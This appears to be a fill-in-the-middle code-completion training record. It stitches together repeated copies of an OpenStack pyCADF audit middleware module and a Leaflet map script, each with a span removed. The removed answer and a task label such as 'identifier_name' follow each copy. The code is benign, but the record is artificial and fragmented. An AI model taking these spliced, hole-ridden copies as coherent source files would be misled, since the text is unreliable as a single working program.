# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
|
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id | identifier_body |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def | (self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| _get_action | identifier_name |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
|
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| target.add_address(public_end) | conditional_block |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function | () {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | setOverlayLayers | identifier_name |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
